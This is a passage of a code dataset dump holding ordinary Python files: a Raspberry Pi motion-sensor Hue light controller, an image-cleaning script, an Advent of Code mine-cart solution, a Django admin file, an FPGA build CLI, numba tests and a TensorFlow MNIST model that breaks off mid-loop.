self._query(kwargs)\n query = tuple(query) or None\n data = self.find_all(query=query, order=order,\n ignores=ignores, fmt=False)\n return self.pager(data, page=page, page_size=page_size, **kwargs)\n\nadmin_log_serv = AdminLogService()\n","sub_path":"core/service/serv_admin_log.py","file_name":"serv_admin_log.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"302383981","text":"# Import RPi.GPIO to use the GPIO pins\nimport RPi.GPIO as GPIO\n# Import time to enable sleeping\nimport time\n# Import reqests to communicate with the Hue API and\n# json to do JSON stuff\nimport requests, json\n# Import os to get the programs PID\n# , signal to catch SIGTERM and sys to exit Python\nimport os, signal, sys\n# Import PyMysql to do Mysql stuff\nimport pymysql\n# Import logging to do logging\nimport logging\n# Import argv from sys to handle arguments passed \n# to the program\nfrom sys import argv\n\n# Set some basic configuration of the logging\n##\n# format='%(asctime)s %(levelname)s:%(message)s' sets the format \n# of the log message.\n# In this case it is '[time] [message loglevel]:[message]\n# datefmt='%d/%m/%Y %H:%M:%S' sets the format of the timestamp\n# In this case it is day, month (as a number), \n# year (as a four digit number), space, hour (24-hour clock), seconds\n##\n# filename='pirHueLog.log' sets the filename of the logging file\n##\n# Additional parameter level=logging.DEBUG sets the logging level\n# (default is WARNING)\n# Available logging levels are (in ascending order) DEBUG, INFO\n# , WARNING, ERROR, CRITICAL\n# Additional parameter filemode='w' sets the filemode.\n# w means overwrite. 
Default is append\nif len( sys.argv ) == 1:\n loggingLevel = \"CRITICAL\"\nelse:\n scriptName, loggingLevel = argv\nnumericLogLevel = getattr( logging, loggingLevel.upper(), None )\nif not isinstance( numericLogLevel, int ):\n raise ValueError( \"Invalid log level: {0}\".format( loggingLevel ) )\nlogging.basicConfig( \n format='%(asctime)s %(levelname)s %(message)s'\n , datefmt='%d/%m/%Y %H:%M:%S'\n , filename='pirHueLog.log'\n , level=numericLogLevel\n , filemode='w' )\n\n# The number of the pin that the input is connected to\nsensor = 4\n\n# Set the mode that is used to count the pins on the board\nGPIO.setmode( GPIO.BCM )\n# Initialize the pin as an input pin. \n# Set the starting state to DOWN (false)\nGPIO.setup( sensor, GPIO.IN, GPIO.PUD_DOWN )\n\n# Fetch config details from file \ntry:\n with open( \"config.json\", \"r\" ) as configFile:\n # usersDict is now a dictionary with a list with a dictonary\n configData = json.load( configFile )\nexcept FileNotFoundError as err:\n print( \"File not found.\\n Error message: {0}\".format( err ) )\n\n# Assign config variables\ndbHost = configData[\"mysql\"][\"host\"]\ndbUser = configData[\"mysql\"][\"user\"]\ndbPassword = configData[\"mysql\"][\"password\"]\ndbDatabase = configData[\"mysql\"][\"database\"]\nhueUser = configData[\"hue\"][\"userID\"]\nhueIp = \"192.168.1.100\"\nhueApi = \"http://\" + hueIp + \"/api/\" + hueUser\n\n# Logging the config variables\nlogging.debug( \"dbHost = {0}\".format( dbHost ) )\nlogging.debug( \"dbUser = {0}\".format( dbUser ) )\nlogging.debug( \"dbPassword = {0}\".format( \"[REDACTED]\" ) )\nlogging.debug( \"dbDatabase = {0}\".format( dbDatabase ) )\nlogging.debug( \"hueUser = {0}\".format( hueUser ) )\nlogging.debug( \"hueIp = {0}\".format( hueIp ) )\nlogging.debug( \"hueApi = {0}\".format( hueApi ) )\n\n### PyMysql\ndef insertIntoTable( eventText ):\n \"\"\"\n Inserts a row into the database table PIRHUELOG.\n Writes parameter eventText to the DB-column EVENT.\n \"\"\"\n global dbUser, dbHost, dbPassword, dbDatabase\n connection = pymysql.connect( \n host = dbHost, user = dbUser\n , password = dbPassword\n , db = dbDatabase )\n with connection.cursor() as cursor:\n sql = \"insert into pirHueLog ( event ) values ( %s )\"\n cursor.execute( sql, ( eventText ) )\n connection.commit()\n connection.close()\n###\n\ndef terminateReceived( signalnumber, stackFrame ):\n \"\"\"\n When a termination signal is received (through kill),\n this function makes sure the program cleans up after itself\n \"\"\"\n logging.debug( \"Cleaning up GPIO\" )\n GPIO.cleanup()\n # Deletes the PID file\n logging.debug( \"Deleting the pid file\" )\n os.unlink( \"pid.txt\" )\n # Exits Python\n logging.debug( \"Exiting Python\" )\n sys.exit(0)\n return\n\n# Set the handler that is called when SIGTERM is received\nsignal.signal( signal.SIGTERM, terminateReceived )\n\n# Write PID to file. Can only write string, not int\npid = str( os.getpid() )\nlogging.debug( \"Writing PID to file. 
PID is {0}\".format( pid ) )\nwith open( \"pid.txt\", \"w\" ) as pidFile:\n pidFile.write( pid )\n\ndef waitForRise( waitingTime ):\n \"\"\"\n Waits for a rising edge\n Returns True if a rising edge is detected, False otherwise\n Parameter waitingTime defines how many milliseconds the\n function waits before timing out\n \"\"\"\n global sensor\n # A channel can only have one event detection.\n # Need to remove the original one so that I can add one that\n # waits for rising edges\n # This event detection is only used in this function\n GPIO.remove_event_detect( sensor )\n # Waits for a rising edge.\n # Times out after [waitingTime] milliseconds\n waiting = GPIO.wait_for_edge( \n sensor, GPIO.BOTH\n , timeout = waitingTime )\n if waiting is None: # wait_for_edge returns None if it times out\n # Removes the temporary event detection\n GPIO.remove_event_detect( sensor )\n # Adds event detection for both rising and falling edges\n GPIO.add_event_detect( \n sensor\n , GPIO.BOTH\n , callback = callbackFunc )\n return False # No new rising edge detected\n else:\n GPIO.remove_event_detect( sensor )\n GPIO.add_event_detect( \n sensor\n , GPIO.BOTH\n , callback = callbackFunc )\n return True # Rising edge detected\n\ndef getHueState():\n \"\"\"\n Returns the current state of the light;\n True if on, False otherwise\n \"\"\"\n logging.debug( \"Getting light state\" )\n hueResponse = requests.get( hueApi + \"/lights/5/\" )\n hueState = hueResponse.json()['state']['on']\n return hueState\n\ndef callbackFunc( sensor ):\n \"\"\"\n Callback function, is called whenever an edge is detected\n \"\"\"\n # Movement and light is off\n if GPIO.input( sensor ) and not getHueState():\n logging.debug( \"Movement detected while the light is off\" )\n logging.debug( \"Turning the light on\" )\n putResponse = requests.put( \n hueApi + \"/lights/5/state\", '{ \"on\": true }' )\n insertIntoTable( 'Light on' )\n # No movement and light is on\n elif not GPIO.input( sensor ) and getHueState():\n if waitForRise( 600000 ):\n # If the light has been turned off externally,\n # I need to turn it back on\n callbackFunc( sensor )\n else:\n logging.debug( \"Turning the light off\" )\n putResponse = requests.put( \n hueApi + \"/lights/5/state\", '{ \"on\": false }' )\n insertIntoTable( 'Light off' )\n\n# Add event detect with callback\nGPIO.add_event_detect( sensor, GPIO.BOTH, callback = callbackFunc )\n\n# Infinite loop. 
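The Raspberry Pi script above resolves its logging level from a command-line string with getattr(logging, name.upper()) and validates the result with isinstance; that pattern works for any of the five standard level names. A stripped-down version that can be tried on its own, with the format strings copied from the script:

import logging

def configure_logging(level_name: str = "CRITICAL") -> None:
    # DEBUG/INFO/WARNING/ERROR/CRITICAL are module attributes holding ints
    numeric_level = getattr(logging, level_name.upper(), None)
    if not isinstance(numeric_level, int):
        raise ValueError("Invalid log level: {0}".format(level_name))
    logging.basicConfig(
        format="%(asctime)s %(levelname)s %(message)s",
        datefmt="%d/%m/%Y %H:%M:%S",
        level=numeric_level,
    )

configure_logging("debug")
logging.debug("visible, because the level resolved to logging.DEBUG")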
Does nothing\nlogging.info( \"Starting\" )\nwhile 1:\n time.sleep( 1 )\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"546881127","text":"# Refer: https://blog.csdn.net/a19990412/article/details/105940446\n# pip install piexif -i https://pypi.tuna.tsinghua.edu.cn/simple/\n# step 1: iterate over all images and pick out the problematic ones\nimport os\nfrom PIL import Image\nimport cv2\nimport warnings\n\nwarnings.filterwarnings('error')\n\nroot = './train'\n\nf1 = open('pExifError.txt', 'w')\nf2 = open('rgbaError.txt', 'w')\nf3 = open('ExifError.txt', 'w')\nf4 = open('4chImg.txt', 'w')\nf5 = open('WebpError.txt', 'w')\nf6 = open('UnknownError.txt', 'w')\n\nidx = 0\nfor r, d, files in os.walk(root):\n if files != []:\n for i in files:\n fp = os.path.join(r, i)\n try:\n img = Image.open(fp)\n if (len(img.split()) != 3):\n # print('4CH:', fp)\n f4.write('{}\\n'.format(fp))\n\n except Exception as e:\n print('Error:', str(e))\n print(fp)\n if 'Possibly corrupt EXIF data' in str(e):\n print('Exif error')\n f1.write('{}\\n'.format(fp))\n elif 'Palette images with Transparency' in str(e):\n print('rgba error')\n f2.write('{}\\n'.format(fp))\n elif 'Corrupt EXIF data' in str(e):\n print('pExif error')\n f3.write('{}\\n'.format(fp))\n elif 'image file could not be identified because WEBP' in str(e):\n print('Webp error')\n f5.write('{}\\n'.format(fp))\n else:\n print('Unknown error')\n f6.write('{}\\n'.format(fp))\n\n if idx % 5000 == 0:\n print('=' * 20, idx)\n\n idx += 1\n\nf1.close()\nf2.close()\nf3.close()\nf4.close()\nf5.close()\nf6.close()\n\n","sub_path":"data/data_clean1.py","file_name":"data_clean1.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"524157732","text":"import unittest\n\n\ndef input_file():\n # return the input_test file in a text\n file = open('input', 'r')\n lines = [line.rstrip('\\n') for line in file]\n file.close()\n return lines\n\n\ndef output_file():\n # read line of output_1 file\n file = open('output', 'r')\n res = file.read()\n file.close()\n return res\n\n\nclass Cart:\n \"\"\"\n A cart is represented by its coordinates and its direction;\n its moves follow specific rules at an intersection.\n \"\"\"\n def __init__(self, y, x, direction, map, per_intersection_memory=0):\n \"\"\"\n\n :param y: the y coordinate, from 0 to n going down\n :param x: the x coordinate, from 0 to n going right\n :param direction: the direction, represented as the tip of an arrow\n \"\"\"\n self.y = y\n self.x = x\n self.direction = direction\n self.map = map\n self.per_intersection_memory = per_intersection_memory\n\n def get_direction(self):\n \"\"\"\n Accessor for the direction attribute\n :return: direction of the cart, to know where it will go\n \"\"\"\n return self.direction\n\n def get_per_intersection_memory(self):\n # get the current intersection memory\n return self.per_intersection_memory\n\n def get_position_yx(self):\n \"\"\"\n Get the position of the cart\n :return: the position y x of the current cart\n \"\"\"\n return self.y, self.x\n\n def go_east(self):\n \"\"\"\n This function moves the cart one step to the right\n \"\"\"\n self.x += 1\n\n def go_north(self):\n \"\"\"\n This function moves the cart one step up\n \"\"\"\n self.y -= 1\n\n def go_west(self):\n \"\"\"\n This function moves the cart one step to the left\n \"\"\"\n self.x -= 1\n\n def go_south(self):\n 
\"\"\"\n This function permit us to move the cart down\n \"\"\"\n self.y += 1\n\n def direction_south(self):\n self.direction = \"v\"\n\n def direction_east(self):\n self.direction = \">\"\n\n def direction_north(self):\n self.direction = \"^\"\n\n def direction_west(self):\n self.direction = \"<\"\n\n def go_right(self):\n current_direction = self.get_direction()\n if current_direction == \">\":\n self.direction_south()\n elif current_direction == \"^\":\n self.direction_east()\n elif current_direction == \"<\":\n self.direction_north()\n else:\n self.direction_west()\n\n def go_straight(self):\n # nothing to change\n pass\n\n def go_left(self):\n current_direction = self.get_direction()\n if current_direction == \">\":\n self.direction_north()\n elif current_direction == \"^\":\n self.direction_west()\n elif current_direction == \"<\":\n self.direction_south()\n else:\n self.direction_east()\n\n def incr_per_intersection_memory(self):\n self.per_intersection_memory = (self.per_intersection_memory + 1) % 3\n\n def update_direction(self):\n \"\"\"\n This function permits to update the direction using the current case\n \"\"\"\n next_case_coord = self.y, self.x\n next_case = self.map[next_case_coord[0]][next_case_coord[1]]\n direction = self.get_direction()\n if next_case == \"+\":\n if self.per_intersection_memory == 0:\n self.go_left()\n elif self.per_intersection_memory == 1:\n self.go_straight()\n else:\n self.go_right()\n self.incr_per_intersection_memory()\n elif next_case == \"/\":\n if direction == \">\":\n self.direction_north()\n elif direction == \"^\":\n self.direction_east()\n elif direction == \"<\":\n self.direction_south()\n else:\n self.direction_west()\n elif next_case == \"\\\\\":\n if direction == \">\":\n self.direction_south()\n elif direction == \"^\":\n self.direction_west()\n elif direction == \"<\":\n self.direction_north()\n else:\n self.direction_east()\n\n def move(self):\n \"\"\"\n This function calculate the next position of the cart and move it\n \"\"\"\n current_direction = self.get_direction()\n if current_direction == \">\":\n self.go_east()\n elif current_direction == \"^\":\n self.go_north()\n elif current_direction == \"<\":\n self.go_west()\n else:\n self.go_south()\n self.update_direction()\n\n\ndef find_all_direction(line, y, direction):\n finder = False\n x = 0\n # direction\n # first iteration\n while line.find(direction, x) != -1:\n x = line.find(direction, x)\n if x == -1:\n break\n finder = y, x, direction\n x += 1\n if not finder:\n return 0\n return tuple(finder)\n\n\nclass ObjectBuilder:\n \"\"\"\n Builder to instanciate objects from the input_test\n \"\"\"\n def __init__(self, lines):\n self.carts = []\n self.lines = lines\n self.map = self.build_map()\n self.carts = self.build_carts()\n\n def print_carts(self):\n # print the map using the matrix map\n print(self.carts)\n\n def build_carts(self):\n # return a list of carts as (x, y, direction of cart)\n carts = []\n carts_object = []\n y = 0\n for line in self.lines:\n right_direction = find_all_direction(line, y, \">\")\n if right_direction != 0:\n carts.append(find_all_direction(line, y, \">\"))\n left_direction = find_all_direction(line, y, \"<\")\n if left_direction != 0:\n carts.append(find_all_direction(line, y, \"<\"))\n up_direction = find_all_direction(line, y, \"^\")\n if up_direction != 0:\n carts.append(find_all_direction(line, y, \"^\"))\n down_direction = find_all_direction(line, y, \"v\")\n if down_direction != 0:\n carts.append(find_all_direction(line, y, \"v\"))\n y += 1\n 
carts = sorted(carts)\n # browse on list of tuple\n for cart in carts:\n # create each cart object\n carts_object.append(Cart(cart[0], cart[1], cart[2], self.map))\n # remove the carts from the map\n self.remove_carts_from_map(carts_object)\n return carts_object\n\n def remove_carts_from_map(self, carts_object):\n for cart in carts_object:\n self.map[cart.get_position_yx()[0]][cart.get_position_yx()[1]] = \" \"\n\n def build_map(self):\n # return the matrix of the map\n map = []\n for line in self.lines:\n line_list = []\n for i in line:\n line_list.append(i)\n map.append(line_list)\n return map\n\n def get_carts(self):\n \"\"\"\n Give us the carts on a list\n :return: carts[]\n \"\"\"\n return self.carts\n\n def get_map(self):\n \"\"\"\n Give us the map on a matrix\n :return: map[][]\n \"\"\"\n return self.map\n\n\nclass MineCartMadnessManager:\n \"\"\"\n A mine cart madness manager allow us to move carts on the map and find the collision\n \"\"\"\n def __init__(self, carts, map):\n \"\"\"\n\n :param carts: list of carts\n :param map: matrix of map containing turns and intersections\n\n :param collision_position: coordonate of the first collision\n :param last_position: coordonate of the last position of cart\n\n :param collision: True if there was a collision\n :param is_last_cart: True if there was only one cart alive\n \"\"\"\n self.carts = carts\n self.map = map\n self.collision_position = (0, 0)\n self.last_position = (0, 0)\n self.collision = False\n self.is_last_cart = False\n\n def is_collision(self):\n \"\"\"\n Determine if there was a collision between two carts\n :return: True if there was a collision\n \"\"\"\n return self.collision\n\n def there_was_a_collision(self):\n \"\"\"\n The collision between two carts happened\n \"\"\"\n self.collision = True\n\n def the_last_cart_position(self, cart):\n \"\"\"\n The collision between two carts happened\n \"\"\"\n self.last_position = cart.get_position_yx\n\n def get_next_position_cart(self, cart):\n \"\"\"\n Get the next position of the current cart\n :param cart: the cart we want to evaluate\n :return: the next position of the cart\n \"\"\"\n next_position = 0\n curr_direction = cart.get_direction()\n curr_position = cart.get_position_yx()\n if curr_direction == \">\":\n next_position = curr_position[0], curr_position[1] + 1\n elif curr_direction == \"^\":\n next_position = curr_position[0] - 1, curr_position[1]\n elif curr_direction == \"<\":\n next_position = curr_position[0], curr_position[1] - 1\n elif curr_direction == \"v\":\n next_position = curr_position[0] + 1, curr_position[1]\n return next_position\n\n def are_they_on_collision(self, cart):\n \"\"\"\n We know if it will be a collision between the current cart and an other\n :param cart: the current cart\n :return: True if there was a cart with the current cart position\n \"\"\"\n # get the next position of current cart\n #next_position = self.get_next_position_cart(cart)\n current_position = cart.get_position_yx()\n two_cars = 0\n # browse in carts\n for cart in self.carts:\n # if there was a cart here return True\n if current_position == cart.get_position_yx():\n two_cars += 1\n if two_cars == 2:\n self.collision_position = current_position\n return True\n return False\n\n def sort_carts(self):\n \"\"\"\n update the carts order by horizontally then vertically\n \"\"\"\n carts_to_sorted = []\n for cart in self.carts:\n carts_to_sorted.append(tuple((cart.get_position_yx()[0], cart.get_position_yx()[1], cart.get_direction(), cart.get_per_intersection_memory())))\n 
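build_carts and sort_carts in the mine-cart solution above order carts by converting them to (y, x, ...) tuples, sorting, and rebuilding Cart objects, and the Cart class dispatches every move through long if/elif chains over the arrow characters. A sketch of two common simplifications, not a drop-in replacement for the classes above: sorted()/list.sort() with a key function keeps the objects intact, and a lookup table replaces the per-direction branches.

# direction -> (dy, dx); y grows downward, matching the Cart class
DELTAS = {'>': (0, 1), '<': (0, -1), '^': (-1, 0), 'v': (1, 0)}
LEFT_OF = {'>': '^', '^': '<', '<': 'v', 'v': '>'}  # same turns as Cart.go_left()

class MiniCart:
    def __init__(self, y, x, direction):
        self.y, self.x, self.direction = y, x, direction
    def move(self):
        dy, dx = DELTAS[self.direction]
        self.y, self.x = self.y + dy, self.x + dx

carts = [MiniCart(2, 1, '>'), MiniCart(0, 5, 'v'), MiniCart(2, 0, '^')]
# (y, x) tuples compare lexicographically: top-to-bottom, then left-to-right
carts.sort(key=lambda c: (c.y, c.x))
print([(c.y, c.x) for c in carts])  # [(0, 5), (2, 0), (2, 1)]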
carts_to_sorted = sorted(carts_to_sorted)\n self.carts = []\n # browse on list of tuple\n for cart in carts_to_sorted:\n # create each cart object\n self.carts.append(Cart(cart[0], cart[1], cart[2], self.map, cart[3]))\n\n def remove_carts_on_collision(self, cart):\n \"\"\"\n Remove the two carts on collision from the list of carts\n :param cart: the cart to test for the collision\n \"\"\"\n #next_position = self.get_next_position_cart(cart)\n current_position = cart.get_position_yx()\n two_cars = 0\n # browse in carts\n for cart in self.carts:\n # if there was a cart here return True\n if current_position == cart.get_position_yx():\n two_cars += 1\n # use the position to the collision to remove carts\n if two_cars == 2:\n carts_alive = []\n for cart in self.carts:\n if cart.get_position_yx() != current_position:\n carts_alive.append(cart)\n self.carts = carts_alive\n\n def run(self):\n # launch the execution of cart on the map only if there was no collision\n while not self.is_last_cart:\n # browse in each carts\n # refresh order\n # sort carts\n self.sort_carts()\n for cart in self.carts:\n cart.move()\n # determine if it will be a collision between the current cart and another\n if self.are_they_on_collision(cart):\n # set the final parameter and leave the loop\n self.there_was_a_collision()\n # remove all carts on collision\n self.remove_carts_on_collision(cart)\n # get the last position\n if len(self.carts) == 1:\n self.last_position = self.carts[0].get_position_yx()\n self.is_last_cart = True\n break\n\n def print_map_with_carts(self, pos_x=(-1, -1)):\n from copy import deepcopy\n map_with_carts = deepcopy(self.map)\n\n for cart in self.carts:\n y, x = cart.get_position_yx()\n map_with_carts[y][x] = cart.get_direction()\n y, x = pos_x\n if y != -1:\n map_with_carts[y][x] = \"X\"\n string_map = \"\"\n for line in map_with_carts:\n string_map += \"\".join(line) + \"\\n\"\n print(string_map)\n\n def visualize(self):\n return self.last_position[1], self.last_position[0]\n\n def print_map(self):\n # print the map using the matrix map\n for index, values in enumerate(self.map):\n print(index, \"\\t\\t\\t\", values)\n\n\ndef data_retrieve(lines):\n # return the new lines traited\n # count nb cart\n return lines\n\n\ndef data_preparation(lines):\n # return the value of input_test\n return lines\n\n\ndef day_13_part_2(lines):\n # data retrieve\n lines = data_retrieve(lines)\n # data preparation\n object_builder = ObjectBuilder(lines)\n # data modelisation\n mine_cart_madness = MineCartMadnessManager(object_builder.get_carts(), object_builder.get_map())\n # data analyse\n mine_cart_madness.run()\n # data visualize\n last_postion = mine_cart_madness.visualize()\n return str(last_postion[0]) + \",\" + str(last_postion[1])\n\n\nclass TestDay13part2(unittest.TestCase):\n\n def test_day_13_part_2(self):\n lines = input_file()\n res = output_file()\n pred = day_13_part_2(lines)\n assert(pred == res)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"2018/Day 13/Part two/TestDay13part2.py","file_name":"TestDay13part2.py","file_ext":"py","file_size_in_byte":13938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"71242204","text":"from django.contrib import admin\nfrom .models import Project, Event\n\nclass ProjectAdmin(admin.ModelAdmin):\n\tlist_display = [\"name\", \"api_key\", \"api_secret\"]\n\tclass Meta:\n\t\tmodel = Project\n\nclass EventAdmin(admin.ModelAdmin):\n\tlist_display = [\"name\", \"timestamp\", \"token\"]\n\tclass 
Meta:\n\t\tmodel = Event\n\nadmin.site.register(Project, ProjectAdmin)\nadmin.site.register(Event, EventAdmin)\n# Register your models here.\nfrom django.contrib import admin\n\n# Register your models here.\n","sub_path":"rickypanel/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263708357","text":"#!/usr/bin/env python3\n# Copyright (c) 2017 Angel Terrones \n\nimport os\nimport argparse\n\n\nclass Coregen:\n _build_path = './build'\n\n def __init__(self, board):\n parser = argparse.ArgumentParser(description='Core generation.')\n subparser = parser.add_subparsers(title='Sub-commands', description='Available functions',\n help='Description')\n # convert\n p2v = subparser.add_parser('toverilog', help='Translate design to Verilog')\n p2v.set_defaults(func=self.convert_to_verilog)\n # build\n build = subparser.add_parser('build', help='Build bitstream using vendor tools')\n build.set_defaults(func=self.build_project)\n # program\n prog = subparser.add_parser('program', help='Program platform')\n prog.add_argument('--flash', help='Download bitfile to ISF', action='store_true')\n prog.set_defaults(func=self.program)\n\n self.parser = parser\n self.board = board\n\n def run(self):\n args = self.parser.parse_args()\n args.func(args)\n\n def convert_to_verilog(self, args):\n os.makedirs(self._build_path, exist_ok=True)\n self.board.convert(path=self._build_path, trace=False, testbench=False)\n\n def build_project(self, args):\n os.makedirs(self._build_path, exist_ok=True)\n self.board.build(build_path=self._build_path)\n\n def program(self, args):\n prog = self.board.get_programmer()\n bitfile = '{}/{}.bit'.format(self._build_path, self.board.name)\n if args.flash:\n prog.flash(bitfile)\n else:\n prog.load_bitstream(bitfile)\n\n# Local Variables:\n# flycheck-flake8-maximum-line-length: 200\n# flycheck-flake8rc: \".flake8rc\"\n# End:\n","sub_path":"coregen/coregen.py","file_name":"coregen.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"644216722","text":"#! 
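coregen.py above wires each sub-command (toverilog, build, program) to a handler with set_defaults(func=...) and then dispatches through args.func(args). That argparse pattern, reduced to a runnable toy; the greet command and its option are illustrative, not from the original tool:

import argparse

def greet(args):
    print(f"hello, {args.name}")

parser = argparse.ArgumentParser(description="Sub-command dispatch demo.")
subparsers = parser.add_subparsers(title="Sub-commands")
p = subparsers.add_parser("greet", help="Print a greeting")
p.add_argument("--name", default="world")
p.set_defaults(func=greet)  # attach the handler to this sub-command

args = parser.parse_args(["greet", "--name", "coregen"])
args.func(args)  # prints: hello, coregen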
/usr/bin/env python\n# ______________________________________________________________________\n\nfrom numba.translate import _plat_bits\nfrom numba.decorators import autojit\n\nimport numpy as np\nimport numpy\n\nimport unittest\n\n# ______________________________________________________________________\n\n@autojit(backend='ast')\ndef get_ndarray_ndim(ndarr):\n return ndarr.ndim\n\n@autojit(backend='ast')\ndef get_ndarray_shape(ndarr):\n return ndarr.shape\n\n@autojit(backend='ast')\ndef get_ndarray_data(ndarr):\n return ndarr.data\n\n@autojit(backend='ast')\ndef get_ndarray_2_shape_unpack_0(ndarr):\n dim0, _ = ndarr.shape\n return dim0\n\n@autojit(backend='ast')\ndef get_ndarray_2_shape_unpack_1(ndarr):\n _, dim1 = ndarr.shape\n return dim1\n\n# ______________________________________________________________________\n\nclass TestGetattr(unittest.TestCase):\n def test_getattr_ndim(self):\n result = get_ndarray_ndim(np.empty((2,)))\n self.assertEqual(result, 1)\n result = get_ndarray_ndim(np.empty((2, 2)))\n self.assertEqual(result, 2)\n\n def test_getattr_shape(self):\n a = np.empty((10,))\n result = get_ndarray_shape(a)\n self.assertEqual(result[0], 10)\n\n a = np.empty((10, 20))\n result = get_ndarray_shape(a)\n self.assertEqual(result[0], 10)\n self.assertEqual(result[1], 20)\n\n def test_getattr_shape_unpack(self):\n array = np.empty((1, 2))\n dim0 = get_ndarray_2_shape_unpack_0(array)\n dim1 = get_ndarray_2_shape_unpack_1(array)\n self.assertEqual((dim0, dim1), (1, 2))\n\n def test_getattr_data_1(self):\n test_data = numpy.array([1., 2., 3.])\n data_pointer = get_ndarray_data(test_data)\n self.assertEqual(data_pointer[0], 1.)\n self.assertEqual(data_pointer[1], 2.)\n self.assertEqual(data_pointer[2], 3.)\n\n def test_getattr_data_2(self):\n test_data = numpy.array([[1., 2., 3.], [4., 5., 6.]])\n result = get_ndarray_data(test_data)\n self.assertEqual(result[0], 1.)\n self.assertEqual(result[1], 2.)\n self.assertEqual(result[2], 3.)\n self.assertEqual(result[3], 4.)\n self.assertEqual(result[4], 5.)\n self.assertEqual(result[5], 6.)\n\n# ______________________________________________________________________\n\nif __name__ == \"__main__\":\n# TestGetattr('test_getattr_shape').debug()\n unittest.main()\n\n# ______________________________________________________________________\n# End of test_ast_getattr.py\n","sub_path":"numba/tests/test_ast_getattr.py","file_name":"test_ast_getattr.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"239296046","text":"import tensorflow as tf\nimport numpy as np\n\nimport input_data\n\nbatch_size = 128\ntest_size = 256\n\ndef init_weights(shape,name):\n return tf.Variable(tf.random_normal(shape, stddev=0.01),name)\n\n\ndef model(X, w, w2, w3, w4, w_o, p_keep_conv, p_keep_hidden):\n l1a = tf.nn.relu(tf.nn.conv2d(X, w, # l1a shape=(?, 28, 28, 32)\n strides=[1, 1, 1, 1], padding='SAME'))\n l1 = tf.nn.max_pool(l1a, ksize=[1, 2, 2, 1], # l1 shape=(?, 14, 14, 32)\n strides=[1, 2, 2, 1], padding='SAME')\n l1 = tf.nn.dropout(l1, p_keep_conv)\n\n l2a = tf.nn.relu(tf.nn.conv2d(l1, w2, # l2a shape=(?, 14, 14, 64)\n strides=[1, 1, 1, 1], padding='SAME'))\n l2 = tf.nn.max_pool(l2a, ksize=[1, 2, 2, 1], # l2 shape=(?, 7, 7, 64)\n strides=[1, 2, 2, 1], padding='SAME')\n l2 = tf.nn.dropout(l2, p_keep_conv)\n\n l3a = tf.nn.relu(tf.nn.conv2d(l2, w3, # l3a shape=(?, 7, 7, 128)\n strides=[1, 1, 1, 1], padding='SAME'))\n l3 = tf.nn.max_pool(l3a, ksize=[1, 2, 2, 1], # l3 shape=(?, 
4, 4, 128)\n strides=[1, 2, 2, 1], padding='SAME')\n l3 = tf.reshape(l3, [-1, w4.get_shape().as_list()[0]]) # reshape to (?, 2048)\n l3 = tf.nn.dropout(l3, p_keep_conv)\n\n l4 = tf.nn.relu(tf.matmul(l3, w4))\n l4 = tf.nn.dropout(l4, p_keep_hidden)\n\n pyx = tf.matmul(l4, w_o)\n #print(\"model:\",pyx)\n return pyx\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\ntrX, trY, teX, teY = mnist.train.images, mnist.train.labels, mnist.test.images, mnist.test.labels\ntrX = trX.reshape(-1, 28, 28, 1) # 28x28x1 input img\nteX = teX.reshape(-1, 28, 28, 1) # 28x28x1 input img\n\nX = tf.placeholder(\"float\", [None, 28, 28, 1], name='x-input')\nY = tf.placeholder(\"float\", [None, 10], name='y-input')\n\nw2 = init_weights([3, 3, 32, 64],\"w2\") # 3x3x32 conv, 64 outputs\nw = init_weights([3, 3, 1, 32],\"w\") # 3x3x1 conv, 32 outputs\nw3 = init_weights([3, 3, 64, 128],\"w3\") # 3x3x32 conv, 128 outputs\nw4 = init_weights([128 * 4 * 4, 625],\"w4\") # 128 filters * 4*4 image\nw_o = init_weights([625, 10],\"w_o\") # FC 625 inputs, 10 outputs (labels)\n\np_keep_conv = tf.placeholder(\"float\", None,\"p_keep_conv\")\np_keep_hidden = tf.placeholder(\"float\", None,\"p_keep_hidden\")\npy_x = model(X, w, w2, w3, w4, w_o, p_keep_conv, p_keep_hidden)\n\nwith tf.name_scope('cost') as scope:\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(py_x, Y))\n cost_summ = tf.scalar_summary(\"cost\", cost)\nwith tf.name_scope('train') as scope:\n train_op = tf.train.RMSPropOptimizer(0.001, 0.9).minimize(cost)\n\npredict_op = tf.argmax(py_x, 1)\n\nw_o_hist = tf.histogram_summary(\"w_o\", w_o)\ny_hist = tf.histogram_summary(\"y-input\", Y)\np_keep_conv_hist = tf.histogram_summary(\"p_keep_conv\", p_keep_conv)\np_keep_hidden_hist = tf.histogram_summary(\"p_keep_hidden\", p_keep_hidden)\n\n\n# Launch the graph in a session\nwith tf.Session() as sess:\n\n tf.initialize_all_variables().run()\n merged = tf.merge_all_summaries()\n writer = tf.train.SummaryWriter(\"./logs/xor_logs\", sess.graph)\n iii=0\n for i in range(3):\n training_batch = zip(range(0, len(trX), batch_size),\n range(batch_size, len(trX), batch_size))\n\n for start, end in training_batch:\n sess.run(train_op, feed_dict={X: trX[start:end], Y: trY[start:end],\n p_keep_conv: 0.8, p_keep_hidden: 0.5})\n if iii % 100 == 0:\n summary = sess.run(merged, feed_dict={X: trX[start:end], Y: trY[start:end],\n p_keep_conv: 0.8, p_keep_hidden: 0.5})\n writer.add_summary(summary, iii/100)\n #print sess.run(cost, feed_dict={X: trX[start:end], Y: trY[start:end],\n # p_keep_conv: 0.8, p_keep_hidden: 0.5})\n iii+=1\n test_indices = np.arange(len(teX)) # Get A Test Batch\n np.random.shuffle(test_indices)\n test_indices = test_indices[0:test_size]\n\n 